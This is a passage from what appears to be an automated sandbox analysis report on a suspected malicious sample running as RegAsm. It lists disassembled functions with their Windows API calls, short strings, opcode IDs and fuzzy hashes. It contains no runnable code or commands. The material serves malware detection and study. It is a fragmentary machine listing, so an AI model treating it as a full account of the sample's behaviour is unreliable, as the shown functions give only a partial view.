                                                                        • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                        • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                                        Function 00417434 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,756F18FE,?,0041755F,?), ref: 00417452
                                                                        • malloc.MSVCRT ref: 00417459
                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,756F18FE,?,0041755F,?), ref: 00417478
                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 0041747F
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharMultiWide$??3@malloc
                                                                        • String ID:
                                                                        • API String ID: 4284152360-0
                                                                        • Opcode ID: 53c249c4ed26904e3077c8c6e0d5a5fb1c5dae0b3f1e23511c3111531268d4c8
                                                                        • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                                        • Opcode Fuzzy Hash: 53c249c4ed26904e3077c8c6e0d5a5fb1c5dae0b3f1e23511c3111531268d4c8
                                                                        • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                                        Function 004123E2 Relevance: 6.0, APIs: 4, Instructions: 47registryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                                                        • RegisterClassW.USER32(?), ref: 00412428
                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                                        • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: HandleModule$ClassCreateRegisterWindow
                                                                        • String ID:
                                                                        • API String ID: 2678498856-0
                                                                        • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                        • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                                        • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                        • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                                        Function 004173E4 Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                                        • malloc.MSVCRT ref: 00417407
                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 00417425
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharMultiWide$??3@malloc
                                                                        • String ID:
                                                                        • API String ID: 4284152360-0
                                                                        • Opcode ID: e8014e3e073e3038f16ce65d63843526aeb3a562c6a088246885bee1c6057e7d
                                                                        • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                                        • Opcode Fuzzy Hash: e8014e3e073e3038f16ce65d63843526aeb3a562c6a088246885bee1c6057e7d
                                                                        • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                                                        Function 0040F64E Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • memset.MSVCRT ref: 0040F673
                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                                                        • strlen.MSVCRT ref: 0040F6A2
                                                                        • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                        • String ID:
                                                                        • API String ID: 2754987064-0
                                                                        • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                        • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                                        • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                        • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                                        Function 0040F6BD Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • memset.MSVCRT ref: 0040F6E2
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                                                        • strlen.MSVCRT ref: 0040F70D
                                                                        • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                        • String ID:
                                                                        • API String ID: 2754987064-0
                                                                        • Opcode ID: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                        • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                                        • Opcode Fuzzy Hash: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                        • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                                        Function 00414770 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 40COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: wcscpy$CloseHandle
                                                                        • String ID: General
                                                                        • API String ID: 3722638380-26480598
                                                                        • Opcode ID: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                        • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                                                        • Opcode Fuzzy Hash: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                        • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                                                        Function 0041437B Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                          • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                          • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                                        • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                                        • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                                        • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                                        • GetStockObject.GDI32(00000000), ref: 004143C6
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                        • String ID:
                                                                        • API String ID: 764393265-0
                                                                        • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                        • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                                        • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                        • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                                        Function 0040A751 Relevance: 6.0, APIs: 4, Instructions: 34timeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                                        • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                                        • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: Time$System$File$LocalSpecific
                                                                        • String ID:
                                                                        • API String ID: 979780441-0
                                                                        • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                        • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                                                        • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                        • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                                                        Function 004134C6 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • memcpy.MSVCRT ref: 004134E0
                                                                        • memcpy.MSVCRT ref: 004134F2
                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                                        • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: memcpy$DialogHandleModuleParam
                                                                        • String ID:
                                                                        • API String ID: 1386444988-0
                                                                        • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                        • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                                        • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                        • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                                        Function 0040F75C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • wcschr.MSVCRT ref: 0040F79E
                                                                        • wcschr.MSVCRT ref: 0040F7AC
                                                                          • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                          • Part of subcall function 0040AA8C: memcpy.MSVCRT ref: 0040AACB
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: wcschr$memcpywcslen
                                                                        • String ID: "
                                                                        • API String ID: 1983396471-123907689
                                                                        • Opcode ID: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                        • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                                        • Opcode Fuzzy Hash: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                        • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                                        Function 0040A353 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: _snwprintfmemcpy
                                                                        • String ID: %2.2X
                                                                        • API String ID: 2789212964-323797159
                                                                        • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                        • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                                        • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                        • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                                        Function 0040F9B5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: _snwprintf
                                                                        • String ID: %%-%d.%ds
                                                                        • API String ID: 3988819677-2008345750
                                                                        • Opcode ID: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                        • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                                                        • Opcode Fuzzy Hash: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                        • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                                                        Function 0040E758 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • memset.MSVCRT ref: 0040E770
                                                                        • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSendmemset
                                                                        • String ID: F^@
                                                                        • API String ID: 568519121-3652327722
                                                                        • Opcode ID: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                        • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                                        • Opcode Fuzzy Hash: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                        • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                                        Function 004018DB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: PlacementWindowmemset
                                                                        • String ID: WinPos
                                                                        • API String ID: 4036792311-2823255486
                                                                        • Opcode ID: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                        • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                                        • Opcode Fuzzy Hash: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                        • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                                                        Function 004125B6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: ??3@DeleteObject
                                                                        • String ID: r!A
                                                                        • API String ID: 1103273653-628097481
                                                                        • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                        • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                                        • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                        • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                                        Function 0042B9BD Relevance: 5.2, APIs: 4, Instructions: 181COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: memcpy$memset
                                                                        • String ID:
                                                                        • API String ID: 438689982-0
                                                                        • Opcode ID: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                        • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                                                        • Opcode Fuzzy Hash: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                        • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                                                        Function 0040E820 Relevance: 5.1, APIs: 4, Instructions: 70COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: ??2@$memset
                                                                        • String ID:
                                                                        • API String ID: 1860491036-0
                                                                        • Opcode ID: 132c9519558d853c1af1b7fa7761ae76911dbcbc7ff65e94ed4645376a2186b4
                                                                        • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                                        • Opcode Fuzzy Hash: 132c9519558d853c1af1b7fa7761ae76911dbcbc7ff65e94ed4645376a2186b4
                                                                        • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                                        Function 0040D092 Relevance: 5.1, APIs: 4, Instructions: 51COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: ??2@
                                                                        • String ID:
                                                                        • API String ID: 1033339047-0
                                                                        • Opcode ID: 6589a97820dd4164dbe9b7b561e5d9da651562f836a554c3bd3b183484c6dcee
                                                                        • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                        • Opcode Fuzzy Hash: 6589a97820dd4164dbe9b7b561e5d9da651562f836a554c3bd3b183484c6dcee
                                                                        • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49